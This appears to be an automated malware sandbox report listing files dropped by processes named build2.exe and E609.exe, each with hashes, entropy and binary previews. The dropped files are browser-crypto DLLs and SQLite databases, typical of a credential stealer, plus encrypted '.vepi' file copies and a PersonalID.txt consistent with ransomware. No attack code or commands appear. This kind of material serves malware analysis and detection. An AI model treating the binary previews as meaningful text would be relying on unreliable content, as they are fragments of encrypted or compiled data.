SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EGIJEBGDAFHI\HJJECB

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\IDBFHC

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse Filename: BI6oo9z4In.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: btCbrSS2Je.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse Filename: BI6oo9z4In.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: btCbrSS2Je.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_c21224191a167f50d0fc77956927dc29a8d71181_f78a65ed_3ca0ac9a-e644-40b7-b1d7-4546d8e03559\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3666765228285422
Encrypted:	false
SSDEEP:	384:Cj62C14Wbk7jAWMo+hiRichkMAzuiF3Y4lO8k:262HWbk7j0o4QBhkrzuiF3Y4lO8
MD5:	4399A70D56DCDB19DBF387F5F07BE485
SHA1:	CDA15C7D7D3480ACD27BAF9FD2A848E37EEC1853
SHA-256:	413267532A9AA27DD67A337F852CA4B2EA4A29981D6E8C35AE8F8111F4D51EC7
SHA-512:	C48CE27EF104CAEABC51BE31E9FF34F67260358F9023DEF6857FEBD486A1C775DFCD6276E90F2308E8B7046D800C9BDC94785A7025EFDC5BD10A1E1BD0F1B223
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.1.3.9.0.3.2.0.2.5.9.8.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.a.0.a.c.9.a.-.e.6.4.4.-.4.0.b.7.-.b.1.d.7.-.4.5.4.6.d.8.e.0.3.5.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.d.2.6.f.8.4.-.3.2.9.e.-.4.7.e.6.-.a.d.c.1.-.3.3.4.b.5.5.d.d.9.8.d.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.c.5.9.2.-.9.4.9.e.c.c.a.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4DF.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Sat May 25 19:30:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	1155686
Entropy (8bit):	1.3216912023101128
Encrypted:	false
SSDEEP:	3072:i5LjNEpFs2ULLZPpNwMHeRQYf+MBM6UvE1:6Lj8FtU1pNCQXE
MD5:	43CBED0932647EFFEA40D60714EFD322
SHA1:	BC486156106978C482B24DB153F289D97FACAF90
SHA-256:	243A7ADD1F39B32D25C415627E5CC545AFB7EFDCA599EF18976724C9863F3CEB
SHA-512:	770CDCDB9E899C76FCDF43308F4CFC852089D53032AD1922944FB23575B915CDEE59ACC416E16A08986C62C1B63883FBE56B1208120D8E0CB5A6E81959C109E6
Malicious:	false
Preview:	MDMP..a..... .......Y<Rf............d... ........o..............`.......................*A..........x.......8...........T...$.......0...6#.................................d...............................................................................eJ..............Lw......................T............%Rf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBE5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	10852
Entropy (8bit):	3.6954972540051902
Encrypted:	false
SSDEEP:	192:R6l7wVeJdOoToa6YX+IgmfqipEprX89bvqqktCaSfZKfYFm:R6lXJEoTN6YuIgmfqipxvhcCaSfZKfX
MD5:	ED1A198903369680ECEB86C0F02E69AB
SHA1:	8BF0907879C83090228EA8E59C3DA48D7E194B96
SHA-256:	56CB97D9BE1E48A20D898AFB635A8DCC0459648EA24E0AD1D42FADEB3E1CA289
SHA-512:	A30054838389B958E52C43E9FD05D589939CFC1871CB11BCBDAE2F6BEF4927C1383876742CFEFD98557AA2FCEC23AA121A11C00E66473FD482936A8C5681B45B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC34.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.477213924765803
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg771I9qdWpW8VY0Ym8M4JYTFgyq8505Ub9Q3jd:uIjfZI7ds7VUJXuba3jd
MD5:	7575DAB630936861A658DDE15F525BA4
SHA1:	EA214CB2A8AF4DD10486FC56B2D172D155FF6E84
SHA-256:	E19E0412C5DAE11018644F44DD32D221CEDBE7020950472DD991B34ABE857155
SHA-512:	1D2B7BA7E510988FE9190973B230013D68374251F95658B22FB9845D2C1B05312C768D7F8D3928F5A8A4DAE65395653E0376EACCB984FB776EE93AD51A50CD5D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="339033" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	5.0589840894454285
Encrypted:	false
SSDEEP:	3:mCdM8TyWkCVyboyn:MWycyn
MD5:	38924F2436CC79B29A5BCF2E3C1C41EF
SHA1:	4C2BE411671EA0E15BB9F437FA021DD6B1802B4F
SHA-256:	EA272518A151FA4419D63DA1B3AE8512D9EDFDC9455D70879736229563F81DA9
SHA-512:	1D1446EFE7BE19D7034601C20DA35BB82AAEDFE6526CFF1B5FB8F9B555C97356DF70CB3EAACDAF0BF7BF0E41C15DE423313ADBCA6FFA9E7D07A89ECFCB54617E
Malicious:	false
Preview:	SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P..

C:\Users\user\.curlrc

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.29288346406802
Encrypted:	false
SSDEEP:	6:KWKUCS9EywL4jL3KVZ0sJkDn11937yid7T716YEoK3ycfCn3KnWyc3cii96Z:NK9VywLA6VdKjwidLEYEoKcKn1+cii9a
MD5:	A29E4EA53B32FD9CB07C3768CF1659C1
SHA1:	C76EFE6F926AD126B611378DAF0767DCA7D1A238
SHA-256:	FF1A2D8E04DF9290C25038F70D3AF341D1C1616BC614C12645C29AC38FE3B756
SHA-512:	8AC6214E4209BC6A8F834772554806F7E4635FA6E5E62E99A09646AF903065F0F5369F311851C217E4A07D2A4FB8F76EE653D581762578EAB9C3FB417F535B81
Malicious:	false
Preview:	insec..h1.(...8E......t..b.U..6..:Hc......g.(.....t.8...K..h^..w..N..[.j.....:.{.....3"...I..B[...$........R.c..#G..O.`..^49kWh..=...J.vVkT.T<V.t.h\|..v....( 0...B.%.%....Py.{U......jE...O.B..g.n7.].a.....F#'\|...;..}.s...zu...zs].=.{ 8....+`...<*c..<..I.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\.curlrc.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.29288346406802
Encrypted:	false
SSDEEP:	6:KWKUCS9EywL4jL3KVZ0sJkDn11937yid7T716YEoK3ycfCn3KnWyc3cii96Z:NK9VywLA6VdKjwidLEYEoKcKn1+cii9a
MD5:	A29E4EA53B32FD9CB07C3768CF1659C1
SHA1:	C76EFE6F926AD126B611378DAF0767DCA7D1A238
SHA-256:	FF1A2D8E04DF9290C25038F70D3AF341D1C1616BC614C12645C29AC38FE3B756
SHA-512:	8AC6214E4209BC6A8F834772554806F7E4635FA6E5E62E99A09646AF903065F0F5369F311851C217E4A07D2A4FB8F76EE653D581762578EAB9C3FB417F535B81
Malicious:	false
Preview:	insec..h1.(...8E......t..b.U..6..:Hc......g.(.....t.8...K..h^..w..N..[.j.....:.{.....3"...I..B[...$........R.c..#G..O.`..^49kWh..=...J.vVkT.T<V.t.h\|..v....( 0...B.%.%....Py.{U......jE...O.B..g.n7.].a.....F#'\|...;..}.s...zu...zs].=.{ 8....+`...<*c..<..I.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.645666828348303
Encrypted:	false
SSDEEP:	12:kk4YbNTyJaeS8g5D2F+l6LTmcoLoMLxMNa1QaxMM4sicaqAOQgdoqQCXGI1+ciik:vVbNTcNS8g5DivKcWoMWa10sZr9dMtjX
MD5:	22EB250842908928837D3FB9340EC56A
SHA1:	91DD4A26D35CA30965BBA98D466FBB9483B3E722
SHA-256:	3B01CCB4CD73FC970540BDD13BBF6E5D64AA1ACB0A361E94459C95B7C4F644FA
SHA-512:	20431111F5175E1AAA4EC2C5F603CFDEA933A94B881EDEEABD3B19FDD8777435B6323B80865AB32F8F7086B186CA449521BD306CEC919049A12CB06908D50219
Malicious:	false
Preview:	2023/R..1...._{..w.."6W.G..".F'M%.0?....o.....N..Gxs.gm..p1E).Y]...b.....kR%{k....v....V..Y.$.Kf.F.>..7..h.t..}..d...."R....1.u.7...T...}.\|.N....h4c.-._...._......S D.cnZ..J.\.f}b..........\...J.-.7,~....O9..{..@.K.F[.._..<@J....5.-...n".S\|...%$R....pM..=[.. .t........Y}...g.B?R./Q...&.s..P...[.fd....{U..).F..I....D..:.P\|<.G`..8.H"M.X...v.xY....@b.[.r....s:.<.NC..p}n..:......o..K...{...O.....j.y..2......+....@x..?......1-.nw."T...V-..Gl...'.8.......y.R...j.....1..w.......P.m.........".....9CL.C....'.....CAm.....[.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.645666828348303
Encrypted:	false
SSDEEP:	12:kk4YbNTyJaeS8g5D2F+l6LTmcoLoMLxMNa1QaxMM4sicaqAOQgdoqQCXGI1+ciik:vVbNTcNS8g5DivKcWoMWa10sZr9dMtjX
MD5:	22EB250842908928837D3FB9340EC56A
SHA1:	91DD4A26D35CA30965BBA98D466FBB9483B3E722
SHA-256:	3B01CCB4CD73FC970540BDD13BBF6E5D64AA1ACB0A361E94459C95B7C4F644FA
SHA-512:	20431111F5175E1AAA4EC2C5F603CFDEA933A94B881EDEEABD3B19FDD8777435B6323B80865AB32F8F7086B186CA449521BD306CEC919049A12CB06908D50219
Malicious:	false
Preview:	2023/R..1...._{..w.."6W.G..".F'M%.0?....o.....N..Gxs.gm..p1E).Y]...b.....kR%{k....v....V..Y.$.Kf.F.>..7..h.t..}..d...."R....1.u.7...T...}.\|.N....h4c.-._...._......S D.cnZ..J.\.f}b..........\...J.-.7,~....O9..{..@.K.F[.._..<@J....5.-...n".S\|...%$R....pM..=[.. .t........Y}...g.B?R./Q...&.s..P...[.fd....{U..).F..I....D..:.P\|<.G`..8.H"M.X...v.xY....@b.[.r....s:.<.NC..p}n..:......o..K...{...O.....j.y..2......+....@x..?......1-.nw."T...V-..Gl...'.8.......y.R...j.....1..w.......P.m.........".....9CL.C....'.....CAm.....[.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	670
Entropy (8bit):	7.702034177111396
Encrypted:	false
SSDEEP:	12:k/Ya/m7iCgoBdy2UBtsJ3UPom8ur2CdncxLT+Z0Ni6D1g2Jm9Lf1+cii9a:We7i8BSsJ3UPX8CX1M+SU65g2JiLsbD
MD5:	81BD84D9D32A5B034D97A431EF6B776C
SHA1:	5EDD71FE7966890E5277B0AA52339A8725A69B07
SHA-256:	4868A9A199C41E1F08848E7F47048CBFF4C03A414E5E8DB263B1B7DE436AA6A1
SHA-512:	BF4369A488162AFA1877BDFFAE85A1746562FA56CD0A0BBFEC6DE2731275546AD7E3257FBC7E643C908B777CD1391238BDA0663EE94990D496EE2E8A79D72D91
Malicious:	false
